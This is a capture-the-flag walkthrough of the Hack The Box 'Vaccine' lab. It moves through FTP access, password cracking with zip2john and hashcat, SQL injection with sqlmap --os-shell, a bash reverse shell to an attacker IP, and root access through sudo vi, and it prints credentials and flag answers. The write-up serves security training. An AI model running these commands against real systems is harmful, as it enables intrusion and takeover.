# Vaccine

## Initial Scan

```nmap
sudo nmap -T4 -Pn -sV -sC -v 10.129.248.153 -oA Vaccine
```

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FokYgCg4mAIGOezLFgYhQ%2Fimage.png?alt=media&#x26;token=20e13642-0875-4032-8a5d-cbdc587ec6c5" alt=""><figcaption></figcaption></figure>

## Task 1

Besides SSH and HTTP, what other service is hosted on this box?

Answer: FTP

## Task 2

This service can be configured to allow login with any password for specific username. What is that username?

Answer: anonymous

## Task 3

What is the name of the file downloaded over this service?

```
ftp 10.129.248.153
```

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FxddAToTs9XjFafl40m9W%2Fimage.png?alt=media&#x26;token=139b98b4-a404-44fc-965a-c40ac056315d" alt=""><figcaption></figcaption></figure>

Answer: backup.zip

## Task 4

What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts?

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FFPmWugZC7r9w38e9Z8KI%2Fimage.png?alt=media&#x26;token=b76d3230-90ef-4d06-bd36-958de9055410" alt=""><figcaption></figcaption></figure>

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FPuzypiEgPZKFku6nccSK%2Fimage.png?alt=media&#x26;token=bbbd357f-5ee9-4b31-a5e2-38ce0151cb91" alt=""><figcaption></figcaption></figure>

Answer: zip2john

## Task 5

What is the password for the admin user on the website?

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FLRmwrVPbLLRVxHk85Bwi%2Fimage.png?alt=media&#x26;token=6516e22d-5d98-41fe-805b-d19531372421" alt=""><figcaption></figcaption></figure>

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FbZeT4tTASGG2svmyxIDv%2Fimage.png?alt=media&#x26;token=791847d2-16ec-447c-9bd7-201f9a1170a5" alt=""><figcaption></figcaption></figure>

backup.zip password:`41852963`&#x20;

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FC81yhimF76V1WcKO4Zhu%2Fimage.png?alt=media&#x26;token=0972ee11-76ff-4d00-856c-e29374140cbf" alt=""><figcaption></figcaption></figure>

Looking at index.html

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2F07ruNyL7jDGUT61BQgdS%2Fimage.png?alt=media&#x26;token=befe0998-5e9b-4ca1-be3c-c4e67cadb55b" alt=""><figcaption></figcaption></figure>

Put the hash in a file and crack the hash with hashcat

```bash
hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt
```

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FAt4PyyUxw37LVXcLiUzj%2Fimage.png?alt=media&#x26;token=6595a6e0-82f2-4c1a-b5b7-11484643913c" alt=""><figcaption></figcaption></figure>

Answer:qwerty789

## Task 6

What option can be passed to sqlmap to try to get command execution via the sql injection? Looking at `sqlmap -h`

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2F8KbC5UVNn6TW0gVLPGdr%2Fimage.png?alt=media&#x26;token=c61a809f-8f5a-414e-bff2-9808d4eca377" alt=""><figcaption></figcaption></figure>

Answer: --os-shell

## Task 7

What program can the postgres user run as root using sudo?

Get the cookie from the Website.

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FBV52mtD1l9uwasC4jI3c%2Fimage.png?alt=media&#x26;token=1aec7a1c-3c50-4557-98e8-9bc00cb7d146" alt=""><figcaption></figcaption></figure>

```bash
sqlmap -u 'http://10.129.248.153/dashboard.php?search=any+query' --cookie="PHPSESSID=n33tru7g83ed1hqdgfm42gnqic" --os-shell
```

We get our shell.

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2Fl2f9ug4HIgVpeLcsCcBu%2Fimage.png?alt=media&#x26;token=fe4f6f97-d46c-49fd-97d7-025bb591f695" alt=""><figcaption></figcaption></figure>

Start the listener and run

```
bash -c "bash -i >& /dev/tcp/10.10.14.9/443 0>&1"
```

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2F5zq16Lvc2a8GWYNqTDPj%2Fimage.png?alt=media&#x26;token=75e92fbb-93d9-4015-b309-6fb0daf15252" alt=""><figcaption></figcaption></figure>

Answer: vi

## Task 8

Submit user flag

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FlzHm5WU32PQWSRgJzWuf%2Fimage.png?alt=media&#x26;token=a8c49177-31ce-4c99-9b7f-f43c94e60cba" alt=""><figcaption></figcaption></figure>

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FKF5HneTc0UwGXVPKHEsJ%2Fimage.png?alt=media&#x26;token=ed90829c-5e93-4deb-9184-158f5ba3f836" alt=""><figcaption></figcaption></figure>

Answer: ec9b13ca4d6229cd5cc1e09980965bf7

## Task 9

Submit root flag

Looking at files in the /var/www/html as there's this uses PHP. Looking in the dashboard.php file we see

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FtiMsVp4rR0KGjxuY58R6%2Fimage.png?alt=media&#x26;token=970b84db-a651-4c35-b15e-507ad8775cd7" alt=""><figcaption></figcaption></figure>

`user=postgres password=P@s5w0rd!`

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FKHeenUMY90lmrWQmrOy3%2Fimage.png?alt=media&#x26;token=c5a29c23-4f05-42ae-89cd-8fa97d47ecb6" alt=""><figcaption></figcaption></figure>

Looking at various options on [GTBOBins](https://gtfobins.github.io/gtfobins/vi/#sudo)

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2F1v8vQK0ioM9ra0ZeKTIB%2Fimage.png?alt=media&#x26;token=1a7b17ba-d286-44eb-8b56-632cb6f62e4a" alt=""><figcaption></figcaption></figure>

Open a file we could only do as sudo vi

```
type :shell=/bin/sh
ENTER
:shell
ENTER
```

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2Fq76LdVBeJe3j30JYZHDB%2Fimage.png?alt=media&#x26;token=283d8c3e-6697-418e-aaad-90f00049e676" alt=""><figcaption></figcaption></figure>

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FTXlITHFNJAn7VRSfhXYW%2Fimage.png?alt=media&#x26;token=047501ce-0e99-490d-bcc1-ada829ecdd10" alt=""><figcaption></figcaption></figure>

Answer: dd6e058e814260bc70e9bbdef2715849
